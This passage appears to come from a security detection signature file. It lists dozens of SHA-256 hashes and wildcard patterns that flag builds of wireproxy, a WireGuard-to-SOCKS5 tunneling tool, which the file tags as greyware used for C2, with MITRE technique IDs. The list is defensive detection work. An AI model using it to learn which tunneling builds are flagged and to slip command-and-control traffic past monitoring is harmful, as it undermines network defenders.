"*03e55f4304347ccf6363e5770ac810b3eab5212f734dd9bfc6835eb9423b24d5*",".{0,1000}03e55f4304347ccf6363e5770ac810b3eab5212f734dd9bfc6835eb9423b24d5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*07311a98f0eb27945a68e1013e666e2ceff69c9241398b7d572086baabb145ee*",".{0,1000}07311a98f0eb27945a68e1013e666e2ceff69c9241398b7d572086baabb145ee.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*0b8f89e4fc750945542db27755503efb9f7bc315991393be3841a5946cc1f1c9*",".{0,1000}0b8f89e4fc750945542db27755503efb9f7bc315991393be3841a5946cc1f1c9.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*1770fedc0630c7c0602f9adaa1ef853a44cd8a889bfd0786b7cdc8aa05f61db6*",".{0,1000}1770fedc0630c7c0602f9adaa1ef853a44cd8a889bfd0786b7cdc8aa05f61db6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*1bcdf25876c01658756741f64fe06654583e539aa3139bdf55ef1324137e148e*",".{0,1000}1bcdf25876c01658756741f64fe06654583e539aa3139bdf55ef1324137e148e.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*1befd6f9e0bec802dc6a4e2a33a85c967bbe3eb6126c1c4d0182f55aba1166a6*",".{0,1000}1befd6f9e0bec802dc6a4e2a33a85c967bbe3eb6126c1c4d0182f55aba1166a6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*1d023cdd6aa17ec552878b1d36e3ce4fb32dc5b9563042a35452b0800c9da124*",".{0,1000}1d023cdd6aa17ec552878b1d36e3ce4fb32dc5b9563042a35452b0800c9da124.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*2146c1335034e53171750fd914adf88e77bb5d9b2a98c61632474a97ae5b016f*",".{0,1000}2146c1335034e53171750fd914adf88e77bb5d9b2a98c61632474a97ae5b016f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*26e454248321c9543371ce81407a9eba31ebe35c58667daaa588965cdee501fe*",".{0,1000}26e454248321c9543371ce81407a9eba31ebe35c58667daaa588965cdee501fe.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*2dfa8caa50560a707a4877e2c9bb40acecaa475d5b792ef78f5309a46038f1ba*",".{0,1000}2dfa8caa50560a707a4877e2c9bb40acecaa475d5b792ef78f5309a46038f1ba.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*2f4e89575f662c72f7c1dcb4f7b5d2bfb356594883e39b0d3b6e17dd941c278f*",".{0,1000}2f4e89575f662c72f7c1dcb4f7b5d2bfb356594883e39b0d3b6e17dd941c278f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*319aa6516c8bef2fc13ae80390fb4a2a99b8ceaaf6ceb462842001b89f22bca1*",".{0,1000}319aa6516c8bef2fc13ae80390fb4a2a99b8ceaaf6ceb462842001b89f22bca1.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*31c085fa529ca13e77e2ad911bf901a0d0c7e21cd27142b09371da30d676ad60*",".{0,1000}31c085fa529ca13e77e2ad911bf901a0d0c7e21cd27142b09371da30d676ad60.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*3204a42f02f8cfed9ba183a2141e16079ad99854b74f9a9e0c6a4831e8b25d8e*",".{0,1000}3204a42f02f8cfed9ba183a2141e16079ad99854b74f9a9e0c6a4831e8b25d8e.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*340318e256a321e87e1a56c948c1d6ab6dcae8f585aacb26b0de457b215b9fbe*",".{0,1000}340318e256a321e87e1a56c948c1d6ab6dcae8f585aacb26b0de457b215b9fbe.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*356eae02a0b678a82174417da439cbdcab3e678197aa8a91824849fb9085fc32*",".{0,1000}356eae02a0b678a82174417da439cbdcab3e678197aa8a91824849fb9085fc32.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*3e6945f3127371b2f2c3f0bdcb2a1c574f92394cc78fbe2144ecefe23f83c983*",".{0,1000}3e6945f3127371b2f2c3f0bdcb2a1c574f92394cc78fbe2144ecefe23f83c983.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*3ee17b78ee6df429959331d016e7a2a64931584c70275c2b72da8b5ff33a3d59*",".{0,1000}3ee17b78ee6df429959331d016e7a2a64931584c70275c2b72da8b5ff33a3d59.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*4019e9601d40a27634c95f10d98a0ee8c6820d2653665d8c718e132e92887814*",".{0,1000}4019e9601d40a27634c95f10d98a0ee8c6820d2653665d8c718e132e92887814.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*40eb2e3dcca0c9f4ed11b3fd96b5824489f60fc0c3caa8f609539dd68ec6f1d5*",".{0,1000}40eb2e3dcca0c9f4ed11b3fd96b5824489f60fc0c3caa8f609539dd68ec6f1d5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*42f742e6fa63b5b289083c4d17d57065e599754618d56d6a4690199436cdd316*",".{0,1000}42f742e6fa63b5b289083c4d17d57065e599754618d56d6a4690199436cdd316.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*45348fbbfaebb3eeee47d5a96c4254e02e44da4628427fd5da1e5904479b5ce5*",".{0,1000}45348fbbfaebb3eeee47d5a96c4254e02e44da4628427fd5da1e5904479b5ce5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*47b8e0993b997e7f465802945187521ba8c68592af990215cdf43bef121f8df7*",".{0,1000}47b8e0993b997e7f465802945187521ba8c68592af990215cdf43bef121f8df7.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*47e0483c22d1a0554dfa2b9b51895e866932b4c7269dee4ccc6ad41b3e433abc*",".{0,1000}47e0483c22d1a0554dfa2b9b51895e866932b4c7269dee4ccc6ad41b3e433abc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*485911ecec88451f4e4272a732526b5024b815630d0d238c452d7faa097f39de*",".{0,1000}485911ecec88451f4e4272a732526b5024b815630d0d238c452d7faa097f39de.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*487a53f4e4f82f5d0789f4cc7b942bd2accddcd2eb296669afbf7d8cf91c421b*",".{0,1000}487a53f4e4f82f5d0789f4cc7b942bd2accddcd2eb296669afbf7d8cf91c421b.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*4acadcd4e74a40bb798d207b3d25b4b5f43cfddc39f9beb78fe5badf428b47a6*",".{0,1000}4acadcd4e74a40bb798d207b3d25b4b5f43cfddc39f9beb78fe5badf428b47a6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*4cd912755e503c2010ab1f436128165f1f899c384bffce49f183c0663ba5da22*",".{0,1000}4cd912755e503c2010ab1f436128165f1f899c384bffce49f183c0663ba5da22.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*4f3bc75be8df0f82b7b79041715ed30cf1a0e658fe2be024825da74c7a8a37c1*",".{0,1000}4f3bc75be8df0f82b7b79041715ed30cf1a0e658fe2be024825da74c7a8a37c1.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*503c58501ddb578dd5ee825bdacde7e5e416210276ec7e6688c8556dfca9ae26*",".{0,1000}503c58501ddb578dd5ee825bdacde7e5e416210276ec7e6688c8556dfca9ae26.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*54b3370eb307a1b726f60f1c1accfb1159feb6e38d6dfda1fe1c6c1d09f79446*",".{0,1000}54b3370eb307a1b726f60f1c1accfb1159feb6e38d6dfda1fe1c6c1d09f79446.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*573af5ccab4dccb4c9eb1f21b5e65d18c0b3a4e2b262c426b6bebc24243904f1*",".{0,1000}573af5ccab4dccb4c9eb1f21b5e65d18c0b3a4e2b262c426b6bebc24243904f1.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*5a1790facd6c8aea4b8c49a0e8d4aaa2f65e367a5d15c8f58014d62a8668b4df*",".{0,1000}5a1790facd6c8aea4b8c49a0e8d4aaa2f65e367a5d15c8f58014d62a8668b4df.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*5c247bb774e29eb43ef20279ae9d8cee98cd0ec4028dd282a09f0bb84f379976*",".{0,1000}5c247bb774e29eb43ef20279ae9d8cee98cd0ec4028dd282a09f0bb84f379976.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*5c4bcebb1782c9cf6c993a076f306555f62b1c8b14e149478ab2358d5a6ca517*",".{0,1000}5c4bcebb1782c9cf6c993a076f306555f62b1c8b14e149478ab2358d5a6ca517.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*5ddc8f41b610fd28ff2a50d363f3085640b3af7278103524bff3075ca2dd993d*",".{0,1000}5ddc8f41b610fd28ff2a50d363f3085640b3af7278103524bff3075ca2dd993d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*5f523d5a29283d1581a3444d2bdfcab0afd70cb8e2991f1931e70f89e6d8b271*",".{0,1000}5f523d5a29283d1581a3444d2bdfcab0afd70cb8e2991f1931e70f89e6d8b271.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*60e6f67d6d09c7986ee9b2683a77eb28d2004ef5c1fa45ef9b9358bca170fc16*",".{0,1000}60e6f67d6d09c7986ee9b2683a77eb28d2004ef5c1fa45ef9b9358bca170fc16.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*642aad896feb5dad407faf2d4c863afcf715eec4f51b21768cd484867c215031*",".{0,1000}642aad896feb5dad407faf2d4c863afcf715eec4f51b21768cd484867c215031.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*651574316f30fcb27c5730435566812d3bdd67c5615c56473ae2ed1e22adabe2*",".{0,1000}651574316f30fcb27c5730435566812d3bdd67c5615c56473ae2ed1e22adabe2.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*65b130644bca2559f84fca5bb2bc22a1ae7d889f01e8905f9799763720fccdb6*",".{0,1000}65b130644bca2559f84fca5bb2bc22a1ae7d889f01e8905f9799763720fccdb6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*66b52ee470feb8f6d2e6bc138a82d0db8aa59511b3c9f6d44300250ed7273ebc*",".{0,1000}66b52ee470feb8f6d2e6bc138a82d0db8aa59511b3c9f6d44300250ed7273ebc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*66cb20febb3ce35cfd4bd1320e7abd087c6b23aa457f6e350a8b05fddecc641f*",".{0,1000}66cb20febb3ce35cfd4bd1320e7abd087c6b23aa457f6e350a8b05fddecc641f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*6abb1bc9f730937c6bb77f096087aed70599b3e708fe645dbcf8dfe6240d005d*",".{0,1000}6abb1bc9f730937c6bb77f096087aed70599b3e708fe645dbcf8dfe6240d005d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*6cf85567ac67515da97ff2cfd2adea85a088c5bb4b8eb3fc847d6d3d5637b842*",".{0,1000}6cf85567ac67515da97ff2cfd2adea85a088c5bb4b8eb3fc847d6d3d5637b842.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*7a70080db23b2f02e3304cf2e5d41e75286e28d33b79d0cf514f0161dbe378ea*",".{0,1000}7a70080db23b2f02e3304cf2e5d41e75286e28d33b79d0cf514f0161dbe378ea.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*7ea81ae66bbcb8065d3b7d00c7f67738a4f9fc5c38a28a6cd602552369ea3343*",".{0,1000}7ea81ae66bbcb8065d3b7d00c7f67738a4f9fc5c38a28a6cd602552369ea3343.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*80594939a5a0caa3ae0a8425bb0cc149f1ba31b4dfc15fd183ca2ff1650150ad*",".{0,1000}80594939a5a0caa3ae0a8425bb0cc149f1ba31b4dfc15fd183ca2ff1650150ad.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*84024388bfbdb79a8d084767325ef4b8f25c6551f50a1f9beb2409e73041644f*",".{0,1000}84024388bfbdb79a8d084767325ef4b8f25c6551f50a1f9beb2409e73041644f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*851dddcb60f2e90bc02a00a056ec9bf8d131082b0d7e3b9b7bf67ac1a381d297*",".{0,1000}851dddcb60f2e90bc02a00a056ec9bf8d131082b0d7e3b9b7bf67ac1a381d297.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*86bd9d5adf837decef7b59ae3a02134103908a249ddd0457f4a688467a42ca63*",".{0,1000}86bd9d5adf837decef7b59ae3a02134103908a249ddd0457f4a688467a42ca63.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*870089165f0603447e099ef6a27cbf0926fda8cbbe1df6fa3c7021897f1eabcc*",".{0,1000}870089165f0603447e099ef6a27cbf0926fda8cbbe1df6fa3c7021897f1eabcc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*87a0056914c80855f8226b2b23118ed48776bd46a56d1cee328db464ec7502a3*",".{0,1000}87a0056914c80855f8226b2b23118ed48776bd46a56d1cee328db464ec7502a3.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*8ad37d3ba1aeb25f8997349cc4d1ee21540881ebb62249c5b4c95a2a7137dcca*",".{0,1000}8ad37d3ba1aeb25f8997349cc4d1ee21540881ebb62249c5b4c95a2a7137dcca.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*8d9a8c8e646b26d5242d8fa7018bc58147435076d8b9c19fb3df35be786fa2da*",".{0,1000}8d9a8c8e646b26d5242d8fa7018bc58147435076d8b9c19fb3df35be786fa2da.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*8e459ac9f01ef6901b45681fe24dd1abc411a2e35a85a108f9e209d1b0182321*",".{0,1000}8e459ac9f01ef6901b45681fe24dd1abc411a2e35a85a108f9e209d1b0182321.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*905a3126b66ae96cf8171b13f7b727d44971636c1504a496fbd1b7250a491711*",".{0,1000}905a3126b66ae96cf8171b13f7b727d44971636c1504a496fbd1b7250a491711.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*90e0acfe005774296f6b39b88bda3819bb29f0debd6340bc048bfcca38898c8a*",".{0,1000}90e0acfe005774296f6b39b88bda3819bb29f0debd6340bc048bfcca38898c8a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*94158766003e207f843092ba29787aeb83800799fe9f605682c761d8c75deba7*",".{0,1000}94158766003e207f843092ba29787aeb83800799fe9f605682c761d8c75deba7.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*969a0ad64c9d99f21d8e8a8201fa19b0be3a757d220e89492a4d2f532eeae126*",".{0,1000}969a0ad64c9d99f21d8e8a8201fa19b0be3a757d220e89492a4d2f532eeae126.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 